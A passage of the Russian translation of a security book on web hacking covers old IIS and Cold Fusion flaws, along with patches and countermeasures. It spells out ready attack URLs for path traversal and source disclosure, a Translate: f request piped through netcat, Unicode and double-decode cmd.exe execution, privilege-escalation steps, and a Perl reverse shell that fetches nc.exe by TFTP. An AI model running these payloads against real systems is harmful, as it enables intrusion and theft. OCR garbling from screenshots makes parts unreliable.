Стюарт Мак-Клар, Джоел Скембрэй, Джордж Куртц. Секреты хакеров. Безопасность сетей - готовые решения
Подождите немного. Документ загружается.
ную
информацию, как имена и пароли пользователей. Чтобы воспользоваться этой
возможностью, нужно просто добавить точку после URL.
http://192.168.51.101/code/example.asp.
Более подробную информацию об этом изъяне можно найти по адресу
http://
Oliver.efri.hr/~crv/
security/bugs/NT/asp.html.
О Контрмеры
Хорошая новость заключается в том, что компания Microsoft выпустила модуль
обновления для сервера IIS 3.0. Его можно найти по адресу
ftp://ftp.
microsoft.com/bussys/IIS/iis-public/fixes/usa/security/fesrc-fix/.
Однако имеется и плохая новость: выпущенный модуль обновления породил дру-
гой изъян. Замена в имени файла
example.
asp точки на ее
шестнадцатеричное
пред-
ставление
(0x2
е) по-прежнему позволяет взломщику загрузить на свой компьютер
файл с исходным кодом ASP. Для того чтобы воспользоваться этим изъяном, можно
задать следующий адрес URL.
http://192.168.51.101/code/example%2easp
v
Изъян ASP, связанный с
альтернативными
ф
потоками данных
Впервые об этом изъяне в бюллетене Bugtraq сообщил Поль Эштон (Paul Ashton).
В данном случае также можно загрузить исходный код страниц ASP. Этой возможно-
стью легко воспользоваться, поэтому она стала довольно популярна среди новичков.
Просто задайте URL в следующем формате.
http://192.168.51.101/scripts/file.asp::$DATA
Если метод сработал, броузер Netscape попросит указать место, в котором нужно
сохранить файл. Броузер Internet Explorer по умолчанию покажет исходный файл в
диалоговом окне. После этого его можно сохранить и просматривать в любом тексто-
вом редакторе. Более подробную информацию по этому вопросу можно найти по ад-
ресу
http://www.rootshell.com.
О Контрмеры
Модуль обновления для IIS 3.0 можно найти по адресу
ftp:
//ftp.microsoft.-
com/bussys/IIS/iis-public/fixes/usa/security/iis3-datafix/,а для IIS 4.0 —
по адресу
ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/security/
iis4-datafix/.
Для усиления защиты ограничьте доступ ко всем исходным файлам, отменив право
на чтение для группы Everyone. В конце концов, для исходного кода вполне доста-
точно разрешения на выполнение.
•«•"
Р
Изъяны
showcode.
asp И
codebrws.
asp
Рассмотрим еще один изъян, имеющий отношение к IIS 4.0, который также связан
с возможностью просмотра исходного кода ASP. Его отличие от рассмотренных выше
ошибок заключается в том, что сам по себе этот изъян не является ошибкой, а пред-
ставляет собой пример плохого программирования. Если в процессе установки серве-
ра IIS 4.0 будут скопированы также файлы с примерами исходного кода ASP, то не-
Глава 15. Хакинг в Web
615
сколько плохо написанных файлов позволят взломщику загрузить на свой компьютер
другие файлы. Проблема заключается в неспособности сценариев обрабатывать сим-
волы
..,
содержащиеся в пути к файлу. В следующем примере использование файла
showcode.
asp приведет к отображению файла
boot.
ini взламываемой системы
(если доступ ограничен незначительно, то просмотреть можно любой файл).
http://192.168.51.101/msadc/Samples/SELECTOR/showcode.asp?source=/../..
/../../../boot.ini
Точно так же, посредством файла
codebrws.asp
можно просмотреть любой файл,
который находится на локальном диске. Как упоминалось в главе
13,
"Изъяны
средств удаленного управления", можно попытаться найти файлы с расширением CIF
программы
pcAnywhere.
http://192.168.51.101/iissamples/exair/howitworks/codebrws.asp?source=
/../../../../../winnt/repair/setup.log
Изъяны
showcode.
asp и
codebrws.
asp невозможно использовать для кор-
ректной загрузки с целевого узла двоичных файлов. Причина заключается в
том, что сценарий ASP обычно преобразует файлы. Преобразование такого
файла как
SAM._
приведет к его повреждению и сделает его непригодным для
использования. Однако это не помешает умелому хакеру восстановить струк-
туру файла SAM и воспользоваться полученной информацией.
О Контрмеры: использование изъянов в файлах ASP
Рассмотренные выше проблемы можно решить, установив модуль обновления сер-
вера IIS. Этот модуль, а также статью Q232449 из базы знаний компании Microsoft,
можно найти по адресу ftp://ftp.microsoft.com/bussys/HS/iis-public/
fixes/usa/Viewcode-fix/.
I
ИЗЪЯН
webhits.
dll
Ряд проблем, связанных с возможностью просмотра файлов, был выявлен группой
CIS (Cerberus Information Security). Эти изъяны связаны с приложением ISAPI
webhits.dll.
Эта динамически подключаемая библиотека реализует механизм выде-
ления информации в процессе функционирования MS Index Server. Однако ее нали-
чие делает возможным взлом, при котором злоумышленник просматривает важные
исходные коды ASP или другую информацию, содержащуюся на локальном диске.
Первая из возможных атак начинается с использования существующего файла
.HTW
для просмотра исходного кода.
http://192.168.51.101/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=
/../../winnt/repair/setup.log&CiRestriction=none&CiHiliteType=Full
Вторая атака связана с передачей системе имени несуществующего файла. В качестве
основы используется существующий файл и символы пробела
(%20),
число которых пре-
вышает 230 и которые расположены между именем реального файла
(default.asp)
и
расширением
.HTW.
При этом информационные службы Internet игнорируют
расшире-
ние
(.
HTW) и предоставляют в распоряжение взломщика любой файл системы.
http://192.168.51.101/default.asp%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20120%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2
616
Часть IV. Хакинг программного обеспечения
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20.htw?CiWebHitsFile=/../../../../../test.txt&CiR
estriction=none&CiHiliteType=Full
Третья
.HTW-атака
основана на использовании имени файла
null.htw
для поме-
щения в окно броузера необработанного файла.
http://192.168.51.101/null.htw?CiWebHitsFile=/../../../../../winnt/
repair/setup.log&CiRestriction=none&CiHiliteType=Full
Использование предыдущего адреса URL приведет к тому, что сервер IIS предос-
тавит файл
/winnt/repair/setup.log.
0»
6*
¥"«•>
So
Comnwfc»*
\
€
£'
-a
A'
«;•
'&.<*•.*& т
'.:
,,_
8«*
ЬимМ
Ми*
Ноте
.
See*
Миме»
f«*
?•««$>_
$*>?
%'
_ _
1
J|*Boofa»«lt>
А
1ос»1юп:|Ы|р/Л921бе51
101/r^lNw?CWgm<iFfe-/
/7
/../inelpul>/mw«oot/delau»
asptCiReslnclion-nonebOHtileTnie-F
"none"
in
/../../../../inetpub/wwwroot/defaiilt.asp
«
takes you to the
previous
hit.
»
takes you to
the
next hit.
Click
»to
go
to
die
First hit
Welcome
ToES
4.01
Welcome
Learn About
Samples
Welcome to
Microsoft®
Windows NT®
4,0
Option Pack
Microsoft Windows
NT
4.0
Option Pack provides enhanced Web,
application,
and communication services for
Windows
NT Server 4.0. So if
you're
setting up a simple Web site on your corporate intranet,
creating
large sites for the Internet, or developing component-based applications, the
Windows
NT
4.0
Option Pack provides a simple, flexible way to make your
existing
Windows NT Server
4.0
an even stronger Web and
applications
platform
We welcome your feedback! It's important that we incorporate your feedback into our software. Please send any comments or suggestions to
iiswish@microsoft.com.
Internet Information Server
Windows NT Server
©1997 Microsoft
Corporation.
АЛ rights reserved. Legal Notices.
Оспяш*Dor»
Контрмеры: использование изъянов библиотеки
webhits.dll
Для предотвращения использования рассмотренных атак удалите приложения, свя-
занные с файлами . HTW. Для этого откройте диалоговое окно с основными свойства-
ми уязвимого сервера, а затем для службы WWW Service щелкните на кнопке Edit. Да-
лее перейдите во вкладку Home Directory и щелкните на кнопке Configuration из груп-
пы Application Settings. При этом на экране появится следующее диалоговое окно.
Глава 15.
Хакинг
в Web 617
г
Awfcafcn
Mapping»
Ехйгоет
|
EueUlabto
PMh
1
ЕжЫом
»
.asa
.asp
cdx
cet
.cfm
.dbro
.hit
.htw
.ida
<r
DAWINNT\Syjtem32\r<el>[v\atp.dll
DAWINNT\Sjstem32\nel!rv^asp.dl
DAWINNT\System32\nelsrAasp.dl
DAWINNT\Svslem32\ndsrv\asp.dl
dACFUSIONSB.iMSCF.DLL
dACFUSIONSeinMSCF.DLL
O:\WINNT\System32\nelSfv\csm. Л
OAWINNT\Svstem32\«iQ.dl
DAWlNNI\Sy!tem32\«lsrv\Wtp«ibc.dll
D.\WlNNT\Systtm3Adq.«
PUTBELE
PUTBELE
PUTBELE
PUTJJELE
.^
Cvn»
Het>
Затем выделите строку, в которой указано приложение, связанное с файлами .
HTW,
и щелкните на кнопке Remove. После этого Web-сервер больше не будет обращаться
к библиотеке webhits
.dll,
и таким образом этот изъян будет устранен.
Be
£Л
go
Icomunicattx
Beck
knwaid
Rekud
Home
Search
NettM$»
'
Print
Secunly
Shop
^f&p
g
leslriclkjn-noneiCH«eType-Fu(
•tsRMated,
HTTP Error 404
404 Not Found
The
Web server cannot find the file or script you asked for. Please check the URL to ensure that the path is
correct
Please contact the server's administrator if this problem persists.
"*
v
t
a
<=>
*J't
Проблема IIS "Translate:
f"
Популярность
Простота
Опасность
Степень риска
5
9
4
6
Проблема, связанная со вскрытием кода (showcode) не нова: она была характерна и
для более ранних версий Internet Information Server. Она получила название Trans-
late:
f и
была описана Даниелем
Дочкалом
(Daniel Docekal)
в
бюллетене Bugtraq.
Эта проблема является хорошим примером
ситуации,
когда взломщик направляет
Web-серверу неожиданные данные и тем самым заставляет его выполнять неприемле-
мые в обычных условиях действия. Это классический вид атаки против протоколов
обработки документов типа HTTP.
Атака Translate: f состоит в отправке искаженного запроса GET протокола
HTTP на выполнение серверного сценария или обработку другого файла
аналогич-
618
Часть IV. Хакинг программного обеспечения
ного типа (например, файлов с расширением
.ASP
(Active Server Page) или
global.
asa). Эти файлы предназначены для выполнения на сервере, а не на клиент-
ском компьютере. Видоизменение запроса приводит к тому, что Internet Information
Server направляет содержимое файла удаленному клиенту, а не выполняет его с ис-
пользованием
соответствующего
механизма обработки сценариев.
Ключевым свойством искаженного запроса GET для протокола HTTP является на-
личие специального заголовка, завершающегося выражением Translate: f, и ис-
пользование адреса URL, завершающегося символом обратной косой \. Ниже приво-
дится
пример
такого запроса (строка
[CRLF]
означает символ возврата карет-
ки/перевода
строки,
который в
шестнадцатеричной
системе счисления имеет код
ODOA).
Обратите внимание
на
обратную косую после
имени
файла
global.asa
и за-
головок
Translate:
f.
GET
/global.asa\
HTTP/1.0
Host:
192.168.20.10
User-Agent: SensePostData
Content-Type:
application/x-www-form-urlencoded
Translate: f
[CRLF]
[CRLF]
Если путем конвейерной обработки текстовый файл с этой информацией напра-
вить (с помощью утилиты netcat) на уязвимый сервер IIS, то в командной строке
отобразится содержимое файла
/global.
asa.
D:\type
trans.txt|
nc
-nw
192.168.234.41
80
(UNKNOWN)
[192.168.234.41]
80 (?)
open
HTTP/1.1 200 OK
Server:
Microsoft-IIS/5.0
Date: Wed, 23 Aug 2000 06:06:58 GMT
Content-Type:
application/octet-stream
Content-Length:
2790
Etag:
"0448299fcd6bf1:bea"
Last-Modified: Thu, 15 Jun 2000 19:04:30 GMT
Accept-Ranges:
bytes
Cache-Control:
no-cache
<!-Copyright
1999-2000
bigCompany.com—>
<object RUNAT=Server SCOPE=Session
ID=fixit
PROGID="Bigco.object"x/object>
("ConnectionText")
=
"DSN=Phone;UID=superman;Password=test;"
("ConnectionText")
=
"DSN=Backend;UID=superman;PWD=test;"
("LDAPServer")
=
"LDAP://Idap.bigco.com:389"
("LDAPUserlD")
=
"cn=Admin"
("LDAPPwd")
= "password"
Мы слегка модифицировали содержимое файла
global.asa,
чтобы продемонст-
рировать наиболее характерную информацию, которую может извлечь из него взлом-
щик. К сожалению, на многие узлах до сих пор встраивают пароли приложений в
файлы
.ASP
и
.ASA-,
повышая тем самым вероятность последующего проникновения
хакеров в свои пенаты. Как видно из этого примера, взломщик, вскрывший содержи-
мое файла
global.asa,
получает в свое распоряжение пароли многих серверов ниж-
него уровня, включая систему LDAP.
Готовые сценарии взлома на языке Perl, упрощающие описанную выше процедуру
использования команды netcat, можно найти в Internet (авторы этой книги пользо-
вались сценариями trans.pl Ройлофа Темминга (Roelof Temmingh) и srcgrab.pl
Смайлера
(Smiler)).
Глава 15.
ХакингвМеЬ
619
Проблема
Translate:
f -
протокол WebDAV
и
канонизация
При первом выявлении этой проблемы вокруг ее причин разгорелись бурные спо-
ры. Официальная позиция компании Microsoft сводилась к тому, что причиной явля-
ется некорректное поведение внутреннего обработчика файлов в ядре
IIS
(что в про-
шлом действительно приводило к некоторым проблемам). Эта позиция была обнаро-
дована в разделе MSOO-58, посвященном вопросам безопасности. Эту информацию
можно найти по адресу
http://www.microsoft.com/technet/security/bulletin/
fqOO-058.asp.
Однако Даниель
Дочкал
(Daniel Docekal) считает, что причиной проблемы является
протокол WebDAV (Web Distributed Authoring and
Versioning)
— протокол обеспечения
стандартов Internet, поддерживаемый преимущественно компанией Microsoft и позво-
ляющий удаленным авторам создавать, удалять, перемещать, находить и изменять атри-
буты файлов и каталогов на Web-серверах (чувствуете, с какими проблемами это может
быть
сопряжено?).
Протокол WebDAV Web-сервером IIS 5 поддерживается по умолча-
нию. И хотя заголовок HTTP Translate: не описан в спецификации протокола
WebDAV (RFC 2518) или других известных авторам документах, Даниель Дочкал утвер-
ждает, что встречал ссылку на него в библиотеке сети MSDN компании Microsoft. По
его словам, там рассказывалось об использовании этого заголовка для получения файло-
вого потока путем указания значения
F
(false)
в
поле заголовка
Translate.
В процессе обсуждения этого вопроса с группой обеспечения безопасности про-
дуктов Microsoft выяснилось, что это действительно так. По словам специалистов,
протокол WebDAV реализован
в
виде фильтра
ISAPI
с
именем
httpext.dll,
интер-
претирующего Web-запросы до их передачи ядру IIS. Заголовок Translate: f пред-
полагает обработку этого запроса, а обратная косая вводит фильтр WebDAV в заблуж-
дение, в результате чего этот запрос направляется непосредственно операционной
системе. Система Win 2000 благополучно возвращает этот файл системе злоумышлен-
ника, а не выполняет его на сервере (как положено по всем правилам).
Здесь мы вплотную подошли к вопросу канонизации (canonization). Это понятие
описано специалистами компании Microsoft в разделе MSOO-57 по адресу
http://www.microsoft.com/technet/security/bulletin/fqOO-057.asp. Там го-
ворится следующее: "Канонизация — это процесс приведения различных эквивалент-
ных форм имени к единому стандартному имени, называемому каноническим именем
(canonical name). Например, на данном компьютере имена
c:\dir\test.dat
и
. .
\..
\test.
dat
могут ссылаться
на
один
и тот же
файл. Канонизация
— это
процесс
приведения таких имен к виду
с:
\dir\test.dat".
Использование одной из различных эквивалентных форм канонического имени
файла может привести к обработке запроса другими средствами
IIS
или операционной
системы. Хорошим примером проблемы канонизации является
вскрытие
исходного
кода
с
помощью выражения
: :
$DATA.
Если
к
некоторому файлу обратиться
с
исполь-
зованием другого имени, то файл будет возвращен броузеру в некорректном виде.
Подобным образом работает и заголовок
Translate:
f. Значение f вводит службу
WebDAV в заблуждение, в результате чего файловый поток возвращается броузеру.
О
Контрмеры: решение
для
проблемы
Translate:
£
Чтобы уменьшить риск, связанный с проблемой
Translate:
f и другими попыт-
ками вскрытия кода, достаточно просто иметь в виду, что любые выполняемые на
сервере файлы могут быть видимы пользователям Internet, и никогда не хранить в них
секретную информацию. Неизвестно, связано ли это с участившимися попытками
вскрытия кода, но компания Microsoft предлагает такой подход в качестве "обычной
рекомендации по безопасности" в разделе FAQ MSOO-58, уже упомянутом ранее.
620 Часть IV. Хакинг программного обеспечения
Еще один способ решения этой проблемы сводится к установке сервисного пакета
Service Pack 1 для системы Win 2000, упомянутого в том же разделе
FAQ.
При его ус-
тановке IIS будет интерпретировать серверные исполняемые сценарии и соответст-
вующие типы файлов с помощью соответствующего серверного механизма обработки
сценариев независимо от типа заголовка.
Как указывает
Расе
Купер (Russ Cooper) (бюллетень NTBugtraq), проблема Trans-
late:
f
существенно связана
с
версией сервера IIS. Например, модуль обновления
для IIS 4 успешно решает эту проблему. Таким образом, решение указанной пробле-
мы сводится к следующему.
Т Описанная проблема для IIS 4.0/IIS 5.0, а также проблема размещения вирту-
альных каталогов на совместно используемых дисках с именами UNC, решает-
ся с помощью
MSOO-019.
Таким образом, после установки сервисного пакета
системы с сервером IIS 4 становятся неуязвимыми для таких атак.
А Системы на базе IIS 5.0 (с применением MSOO-019 или без) необходимо обно-
вить с помощью сервисного пакета SP1 или MSOO-058.
Заметим также, что если для виртуального каталога IIS, содержащего нужный
файл, установлено разрешение, отличное от Read, то при атаке
Translate:
f будет
возвращена ошибка "HTTP 403 Forbidden" (даже если установлен режим Show Source
Code). Если же для виртуального каталога, содержащего указанные файлы установле-
но разрешение Read, то эти файлы, могут быть доступны взломщику.
Изъян проверки ввода Unicode
Популярность
Простота
Опасность
Степень риска
10
8
7
8
Стандарт Unicode используется как единый набор символов алфавитов всех сущест-
вующих языков. Поддержка двух- или трехбайтового набора символов Unicode реализова-
на далеко не всеми производителями программного обеспечения, так что его применение
ограничивается основными Web-серверами, такими как IIS компании Microsoft и Apache.
Источником изъяна является не сам набор символов Unicode, а, скорее, реализа-
ция его поддержки в программном обеспечении. Впервые этот изъян упоминался на
одном из форумов Internet, а позже соответствующая информация была распростра-
нена группой специалистов Rain.forest.puppy (RFP). В конце 2000 года отчет о своих
исследованиях выпустила компания
NSFocus
(http://www.nsfocus.com).
Проблема
возникает при следующих условиях (которые достаточно типичны).
Т В системе имеется доступный для записи и выполнения программ каталог, что
позволяет взломщикам загрузить требуемый код.
• В корневом каталоге Web-сервера содержится системный исполняемый файл, та-
кой как
cmd.
ехе, и в системе не определен список управления доступом ACL.
При описанных условиях взломщик может перейти в корневой каталог Web-
сервера, локально запустить файл
cmd.exe
или
command.exe
и выполнить любую ко-
манду с правами учетной записи IUSR. Для реализации атаки можно воспользоваться
следующим кодом.
GET /scripts/..%cO%af..%cO%af..%cO%af../winnt/system32/cmd.exe?+/
c+dir+'c:\'
HTTP
/1.0
Глава 15. Хакинг в Web 621
При
этом строкой
%cO%af
пользоваться необязательно.
К
другим "некорректным"
представлениям символов
"/"и
"\"
относятся следующие.
Т %cl%lc
• %cl%9c
• %cO%9v
• %cO%af
• %cO%qf
• %cl%8s
A %cl%pc
Изъян Unicode можно использовать совместно со стандартным
хакерским
приемом
загрузки утилиты netcat и получения доступа к командной оболочке. Кроме того,
взломщики могут воспользоваться другими исполняемыми файлами, например, кли-
ентом
TFTP,
чтобы получить доступ к netcat, установленной на удаленной системе.
При этом взломщику нужно решить одну проблему: запустить утилиту netcat в
контексте учетной записи IUSR без каких бы то ни было дополнительных привилегий.
Для расширения привилегий в системе Windows NT можно воспользоваться утилитой
hk.exe
Тодда Сабина (Todd Sabin,
http:
//www.nmrc.org).
В системе Windows 2000 это
сделать гораздо сложнее, хотя по-прежнему возможно. Для расширения привилегий на
сервере
IIS
5 с поддержкой Unicode необходимо выполнить следующие действия.
1. Создайте динамическую библиотеку ISAPI с вызовом функции, связывающей
работающие в рамках процесса IIS приложения с контекстом учетной записи
SYSTEM. Затем добавьте
текущего
пользователя (IUSR) в локальную группу ад-
министраторов и обновите маркер доступа текущего пользователя, чтобы вне-
сенные изменения немедленно вступили в силу.
2. Переименуйте эту DLL, присвоив ей одно из имен, содержащихся в разделе
реестра IIS
Metabase/LM/W3SVC/InProcesslsapiApps.
(Среди этих имен
idq.dll, httpext.dll,
httpodbc.dll,
ssinc.dll, msw3prt.dll, author.dll,
admin.dll
И
shtml.dll.)
3. С помощью механизма Unicode загрузите динамическую библиотеку на целевой
сервер. (Этот трюк могут выполнить различные сценарии, в частности,
unicodeloader.pl
Ролофа Темминга (Roelof Temmingh).) При этом библиоте-
ка DLL должна быть загружена в каталог, в котором пользователь IUSR имеет
право запуска программ. (Хорошим выбором является каталог /scripts.)
4. Вызовите библиотеку через Web-броузер, что приведет к добавлению пользова-
теля IUSR в локальную группу администраторов. Теперь с помощью механизма
Unicode взломщик может удаленно запустить командную оболочку
cmf.
exe с
привилегиями, эквивалентными администратору. Вот и все, игра закончена.
Описанная концепция была предложена и разработана Одедом Горовитцем (Oded
Horovitz)
с участием Глазера (JD
Glaser),
ведущего инженера компании Foundstone.
О Контрмеры
Для устранения изъяна Unicode существует несколько возможностей. Лучше
всего установить соответствующий модуль обновления компании Microsoft. Его
можно найти в бюллетенях MSOO-057, MSOO-078 и MSOO-086. Для защиты сервера
IIS можно также последовать рекомендациям компании Microsoft, которые можно
найти по следующим адресам.
622 Часть IV. Хакинг программного обеспечения
Windows NT
http://www.microsoft.com/technet/itsolutions/
security/tools/iischk.asp
Windows 2000
http://www.microsoft.com/technet/itsolutions/
security/tools/iis5chk.asp
;
,
Изъян проверки ввода
'"
при двойном декодировании
Популярность
Простота
Опасность
Степень риска
9
8
7
8
В мае 2001 года группа исследователей компании
NSFocus
(http:/www.nsfocus.com)
сообщила о другом изъяне, подобном изъяну Unicode. Эта ошибка связана с тем, что
в некоторых случаях сервер IIS выполняет двойное декодирование зашифрованных в
шестнадцатеричной
форме адресов URL. При этом после завершения первой опера-
ции декодирования сервер
IIS
выполняет единственную проверку. В результате будет
выполнен переданный запрос, поскольку последующих проверок после второго деко-
дирования не выполняется. Для реализации атаки, основанной на этом изъяне, мож-
но воспользоваться следующим адресом URL.
http://www.example.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Как и в случае использования механизма поддержки Unicode, с каталогом должно
быть связано право запуска программ. При использовании изъяна двойного декоди-
рования в запросе можно использовать также следующие строки.
Т
%255с
•
%%35с
•
%%35%63
А
%25%35%63
О Контрмеры
По адресу
http://www.microsoft.com/technet/treeview/default.asp?url=/
technet/security/bulletin/ms01-026.asp
можно найти модуль обновления, по-
зволяющий устранить изъян двойного декодирования.
^^ЩЩ
В
разделе "Переполнение
буфера"
ниже
в
этой
главе
содержится
описание
более разрушительных изъянов сервера IIS.
Изъяны сервера Cold Fusion
Специалистами группы LOpht было обнаружено несколько существенных изъянов
сервера приложений Cold Fusion, позволяющих осуществлять удаленный запуск ко-
манд на уязвимом Web-сервере. В процессе установки этого программного продукта
вместе с ним копируются также примеры кода и интерактивная документация. При-
чиной обнаруженных изъянов послужили несколько файлов примеров, возможность
использования которых не ограничивается только локальным узлом.
Глава
15.
Хакинг
в Web 623
Изъян
openfile.cfm
Популярность
Простота
Опасность
Степень риска
9
9
8
9
Первая из проблем связана с устанавливаемым по умолчанию файлом
openf
ile.cfm.
Этот файл позволяет взломщику загрузить на целевой Web-сервер лю-
бой локальный файл. Другой файл,
displayopenedfile.cfm,
помещает этот файл в
окно броузера. Кроме того,
exprcalc.cfm
анализирует загруженный файл и удаляет
его (во всяком случае,
он
для этого предназначен). Используя только файл
openf
ile.cfm,
можно ввести систему в заблуждение, чтобы она не удаляла загружен-
ный файл, а затем выполнить локально любую команду. Чтобы воспользоваться этой
возможностью, выполните следующие действия.
1. Создайте файл, который при загрузке на удаленный Web-сервер приведет к вы-
полнению локальной команды. Например, можно воспользоваться следующим
сценарием
Perl
с
именем
test.pl.
system("tftp
-i
192.168.51.100
GET
nc.exe");
system("nc
-e
cmd.exe
192.168.51.100
3000");
Этот метод сработает в том случае, если на сервере Cold Fusion установлен
интерпретатор языка Perl.
2. Задайте в броузере следующий адрес URL.
http://192.168.51.101/cfdocs/expeval/openfile.cfm
3. Укажите в поле Open File путь к созданному файлу и щелкните на кнопке ОК.
Е*
До
Commuracatot
jjeb
"~
Beck
:
я*гл1
BebMd
Home Search
Nelscape
^^"Bookfriekt
J£
LocationJ
а,
ж
Shop
V:?
jFWhrfj
Related
OPEN
HUE
Specify the file to be
loaded
into the
expression
window :
|d:\
cernp\
test
.pi
BfOWSC...
|
Cancel OK
fDocument
Done
На экране появится следующее диалоговое окно.
624 Часть IV. Хакинг программного обеспечения